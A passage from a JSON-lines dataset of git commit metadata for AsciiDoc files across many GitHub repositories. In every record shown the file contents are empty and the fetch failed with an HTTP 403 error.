\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhood
a2000\/elasticsearch,glefloch\/elasticsearch,fforbeck\/elasticsearch,nknize\/elasticsearch,artnowo\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,mikemccand\/elasticsearch,a2lin\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elasticassandra,fernandozhu\/elasticsearch,Helen-Zhao\/elasticsearch,C-Bish\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,fforbeck\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,wangtuo\/elasticsearch,bawse\/elasticsearch,nilabhsagar\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elasticassandra,C-Bish\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,gfyoung\/elasticsearch,artnowo\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,JackyMai\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,bawse\/elasticsearch,kalimatas\/elasticsearch,MaineC\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch,StefanGor\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,LewayneNaidoo\/elasticsearch,obourgain\/elasticsearch,nezirus\/elasticsearch,JSCooke\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,mjason3\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch","old_file":"docs\/reference\/modules\/discovery\/zen.asciidoc","new_file":"docs\/reference\/modules\/discovery\/zen.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a82187ac32d6d1c5ed2bef9c33b66bf0d5cfcee","subject":"Update 2015-02-01-the-AsciiDoc-introduction.adoc","message":"Update 2015-02-01-the-AsciiDoc-introduction.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-01-the-AsciiDoc-introduction.adoc","new_file":"_posts\/2015-02-01-the-AsciiDoc-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9d2d79b82b319a378a1ae7090c5107844386749","subject":"Create New article","message":"Create New article\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-17-Euro-Watching-Engineering.adoc","new_file":"_posts\/2016-06-17-Euro-Watching-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"260bef8fe0ca2bf6ae7504524f7ebe02c8526ef5","subject":"Update 2016-01-01-2016-The-Goldern-year.adoc","message":"Update 
2016-01-01-2016-The-Goldern-year.adoc","repos":"JacobSamro\/blog,JacobSamro\/blog,JacobSamro\/blog","old_file":"_posts\/2016-01-01-2016-The-Goldern-year.adoc","new_file":"_posts\/2016-01-01-2016-The-Goldern-year.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JacobSamro\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46b8ccac8588bee63e29d31d2d2733ee26190e8a","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f43d51fc7bac1191ffbba2dee4f555638d4c364","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e21fe9859f9e1faa6b8ce9c397b57b8c07b304","subject":"Update 2016-06-11-Main-Title-Subtitle.adoc","message":"Update 2016-06-11-Main-Title-Subtitle.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Main-Title-Subtitle.adoc","new_file":"_posts\/2016-06-11-Main-Title-Subtitle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"163e13f94b0376ef5ebaf8381a360ac20a81844e","subject":"add tools.build guide","message":"add tools.build guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/build.adoc","new_file":"content\/guides\/build.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5f737fdc2fc5125bb8c59836939fa6592f806e33","subject":"Update 2015-06-12-JS-ES6-classes.adoc","message":"Update 2015-06-12-JS-ES6-classes.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-12-JS-ES6-classes.adoc","new_file":"_posts\/2015-06-12-JS-ES6-classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5090ab0e700fc1b22cfed20bf4615e16958a4c2","subject":"Added Otherwise EIP docs","message":"Added Otherwise EIP 
docs\n","repos":"CodeSmell\/camel,gautric\/camel,objectiser\/camel,jamesnetherton\/camel,davidkarlsen\/camel,dmvolod\/camel,anoordover\/camel,anoordover\/camel,kevinearls\/camel,objectiser\/camel,jamesnetherton\/camel,adessaigne\/camel,tadayosi\/camel,tdiesler\/camel,nikhilvibhav\/camel,apache\/camel,nicolaferraro\/camel,gautric\/camel,tdiesler\/camel,cunningt\/camel,nicolaferraro\/camel,objectiser\/camel,tadayosi\/camel,gnodet\/camel,curso007\/camel,nicolaferraro\/camel,dmvolod\/camel,gautric\/camel,akhettar\/camel,onders86\/camel,kevinearls\/camel,mcollovati\/camel,kevinearls\/camel,sverkera\/camel,kevinearls\/camel,onders86\/camel,gautric\/camel,dmvolod\/camel,zregvart\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,zregvart\/camel,christophd\/camel,sverkera\/camel,jonmcewen\/camel,tdiesler\/camel,anoordover\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,adessaigne\/camel,jonmcewen\/camel,christophd\/camel,punkhorn\/camel-upstream,tadayosi\/camel,CodeSmell\/camel,pmoerenhout\/camel,DariusX\/camel,snurmine\/camel,cunningt\/camel,kevinearls\/camel,akhettar\/camel,apache\/camel,mcollovati\/camel,DariusX\/camel,apache\/camel,gautric\/camel,adessaigne\/camel,CodeSmell\/camel,adessaigne\/camel,tadayosi\/camel,jonmcewen\/camel,akhettar\/camel,akhettar\/camel,sverkera\/camel,pmoerenhout\/camel,onders86\/camel,davidkarlsen\/camel,DariusX\/camel,adessaigne\/camel,sverkera\/camel,dmvolod\/camel,curso007\/camel,DariusX\/camel,dmvolod\/camel,jamesnetherton\/camel,alvinkwekel\/camel,curso007\/camel,pax95\/camel,alvinkwekel\/camel,pax95\/camel,christophd\/camel,ullgren\/camel,gnodet\/camel,snurmine\/camel,ullgren\/camel,pax95\/camel,jonmcewen\/camel,cunningt\/camel,tdiesler\/camel,ullgren\/camel,sverkera\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,tdiesler\/camel,akhettar\/camel,kevinearls\/camel,curso007\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,curso007\/camel,pmoerenhout\/camel,jonmcewen\/camel,ullgren\/camel,anoordover\/camel,curso007\/camel,objectiser\/camel,apache\/camel,punkhorn\/camel-upstream,apache\/camel,davidkarlsen\/camel,mcollovati\/camel,snurmine\/camel,pax95\/camel,onders86\/camel,snurmine\/camel,tadayosi\/camel,onders86\/camel,dmvolod\/camel,jamesnetherton\/camel,onders86\/camel,gnodet\/camel,christophd\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,snurmine\/camel,tadayosi\/camel,CodeSmell\/camel,nikhilvibhav\/camel,jonmcewen\/camel,pax95\/camel,gautric\/camel,apache\/camel,Fabryprog\/camel,snurmine\/camel,zregvart\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,cunningt\/camel,anoordover\/camel,akhettar\/camel,alvinkwekel\/camel,gnodet\/camel,pmoerenhout\/camel,cunningt\/camel,sverkera\/camel,jamesnetherton\/camel,christophd\/camel,zregvart\/camel,pmoerenhout\/camel,nicolaferraro\/camel,mcollovati\/camel,anoordover\/camel,Fabryprog\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/otherwise-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/otherwise-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"902fc519570fe588993792efae6e54275f7f2bcc","subject":"Update 2014-08-14-Episode-10-Pinball-Galore.adoc","message":"Update 
2014-08-14-Episode-10-Pinball-Galore.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-08-14-Episode-10-Pinball-Galore.adoc","new_file":"_posts\/2014-08-14-Episode-10-Pinball-Galore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1104758a52a663d2c9c93ee91ec743bc93719df2","subject":"Update 2015-02-16-Getting-started-with-Hubpress.adoc","message":"Update 2015-02-16-Getting-started-with-Hubpress.adoc","repos":"alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io","old_file":"_posts\/2015-02-16-Getting-started-with-Hubpress.adoc","new_file":"_posts\/2015-02-16-Getting-started-with-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchapone\/alchapone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d272931d4012266f680699ce3de6920e03059987","subject":"Remove submodules configuration","message":"Remove submodules configuration","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"99a4954e55e73234842470f1469f740da5af7ed5","subject":"Update 2016-02-04-Merge-vs-Rebase-in-Git.adoc","message":"Update 2016-02-04-Merge-vs-Rebase-in-Git.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-04-Merge-vs-Rebase-in-Git.adoc","new_file":"_posts\/2016-02-04-Merge-vs-Rebase-in-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38dc496b9c5d8c1ab8071ac5dfb7d3f3c0dd0dbf","subject":"Update 2017-02-21-2.adoc","message":"Update 2017-02-21-2.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21-2.adoc","new_file":"_posts\/2017-02-21-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad916b0850a2e548194b1f47ce009c7f738135f2","subject":"chore(promise-resolve): \u6587\u7ae0\u304c\u5bfe\u3068\u306a\u308b\u3088\u3046\u306b","message":"chore(promise-resolve): \u6587\u7ae0\u304c\u5bfe\u3068\u306a\u308b\u3088\u3046\u306b\n\n\u3000\nfixes 
#73\n","repos":"dieface\/promises-book,oToUC\/promises-book,dieface\/promises-book,oToUC\/promises-book,azu\/promises-book,genie88\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,purepennons\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,purepennons\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,liubin\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,mzbac\/promises-book,genie88\/promises-book,liubin\/promises-book,tangjinzhou\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,liubin\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,oToUC\/promises-book,charlenopires\/promises-book,azu\/promises-book,azu\/promises-book","old_file":"Ch2_HowToWrite\/promise-resolve.adoc","new_file":"Ch2_HowToWrite\/promise-resolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad905bbde77811053baf7d71c4eadd3396f82497","subject":"Update 2015-02-12-a.adoc","message":"Update 2015-02-12-a.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-02-12-a.adoc","new_file":"_posts\/2015-02-12-a.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10932d0c8f6e072af256491a386a3c4d5f509389","subject":"Update 2016-04-07-A.adoc","message":"Update 2016-04-07-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-A.adoc","new_file":"_posts\/2016-04-07-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbb870b4550f2d5a46cc659deba2c63f7ffc79b5","subject":"Updated AUTHORS.adoc","message":"Updated AUTHORS.adoc","repos":"justhackit\/javaanpr,adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,joshuagn\/ANPR","old_file":"AUTHORS.adoc","new_file":"AUTHORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c5ce2938d10862f4ba3909b0423c17c656a478ce","subject":"Added IoCs for TeleBots","message":"Added IoCs for TeleBots\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"telebots\/README.adoc","new_file":"telebots\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} 
{"commit":"2981fd53e91fe7320219d63b0078f009a8d10130","subject":"Changing branching system","message":"Changing branching system\n","repos":"justhackit\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr,justhackit\/javaanpr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89b60f70327ea3987bd40f61802d61e161a351a1","subject":"Adds ReadMe file to repository","message":"Adds ReadMe file to repository\n","repos":"rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC","old_file":"ReadMe.adoc","new_file":"ReadMe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rajadileepkolli\/POC.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b98abedfa739afc8eefcb205205b4c4eff505c6","subject":"Update 2015-09-06-.adoc","message":"Update 2015-09-06-.adoc","repos":"suning-wireless\/Suning-Wireless.github.io,suning-wireless\/Suning-Wireless.github.io,suning-wireless\/Suning-Wireless.github.io","old_file":"_posts\/2015-09-06-.adoc","new_file":"_posts\/2015-09-06-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suning-wireless\/Suning-Wireless.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10ec4c28ea16dd1afc6001e6cd738dc5bc48e37f","subject":"Publish 2017-02-25adocadoc-part-1.adoc","message":"Publish 2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0575128f7cd4c48718548a5a9fa8b91fdff11467","subject":"y2b create post 65\\","message":"y2b create post 65\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-22-65.adoc","new_file":"_posts\/2013-05-22-65.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04a306d5cc935905861426ca27f2a233128a9efa","subject":"linking to Compose file","message":"linking to Compose file\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a4b143fbb4ad1f2faf2a81922cb4873746d36065","subject":"Update 2016-03-03-Playing-with-Source-Maps.adoc","message":"Update 
2016-03-03-Playing-with-Source-Maps.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-03-03-Playing-with-Source-Maps.adoc","new_file":"_posts\/2016-03-03-Playing-with-Source-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91e14b9516f891ce27811940fd05ddc11602429d","subject":"Update 2016-05-16-blabla-1-2-3.adoc","message":"Update 2016-05-16-blabla-1-2-3.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-16-blabla-1-2-3.adoc","new_file":"_posts\/2016-05-16-blabla-1-2-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1735c814fe9ae5e110410303f6b00014c24264dd","subject":"Update 2017-08-03-sed-add-plus.adoc","message":"Update 2017-08-03-sed-add-plus.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-08-03-sed-add-plus.adoc","new_file":"_posts\/2017-08-03-sed-add-plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69665fcbce5bb9208bae6970ed70aab509d0db16","subject":"Update 2014-09-19-Apologizing-for-exuberance.adoc","message":"Update 2014-09-19-Apologizing-for-exuberance.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-19-Apologizing-for-exuberance.adoc","new_file":"_posts\/2014-09-19-Apologizing-for-exuberance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7afcf24a2f80b00c85965ab70333a9cacea8ba00","subject":"Gf \u21d2 GF","message":"Gf \u21d2 GF\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DB from Eclipse.adoc","new_file":"DB from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f36e216264800d9a1fc61329e0f67042ea6be5db","subject":"Update 2012-04-20-Enabling-SOAP-message-signing-for-EJB-webservice-client-in-Glassfish.adoc","message":"Update 
2012-04-20-Enabling-SOAP-message-signing-for-EJB-webservice-client-in-Glassfish.adoc","repos":"pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2012-04-20-Enabling-SOAP-message-signing-for-EJB-webservice-client-in-Glassfish.adoc","new_file":"_posts\/2012-04-20-Enabling-SOAP-message-signing-for-EJB-webservice-client-in-Glassfish.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d45f6c4025196cc4bcb5e8afd67d5bf6a6039b46","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d6742d1360379ad8b08cd1d7cd752e1e0376bb5","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6bbb736d8f91d2bb3ccc817d9d33fdae4662094","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39da78be4e78876d964f2fa1aa8a56ff9d44dc5f","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f56258642166a8df368aa04bcad41140ebeaba59","subject":"Update 2015-08-04-Writting-macro-with-Asciidoctor.adoc","message":"Update 
2015-08-04-Writting-macro-with-Asciidoctor.adoc","repos":"gscheibel\/blog,gscheibel\/blog,gscheibel\/blog","old_file":"_posts\/2015-08-04-Writting-macro-with-Asciidoctor.adoc","new_file":"_posts\/2015-08-04-Writting-macro-with-Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gscheibel\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4109d10146f7bae42c8f47cf90e57c0697e72a3","subject":"Delete 2017-08-14-Azure-6.adoc","message":"Delete 2017-08-14-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Azure-6.adoc","new_file":"_posts\/2017-08-14-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b494a58f5fb408cbfa260ae33bd24254615ffa43","subject":"Update 2015-09-17-first-commit.adoc","message":"Update 2015-09-17-first-commit.adoc","repos":"popurax\/popurax.github.io,popurax\/popurax.github.io,popurax\/popurax.github.io","old_file":"_posts\/2015-09-17-first-commit.adoc","new_file":"_posts\/2015-09-17-first-commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/popurax\/popurax.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14228ba5100d136c01c8eb5a11d8d8d9ddbd1e22","subject":"Update 2017-10-27-Go-lang-memo.adoc","message":"Update 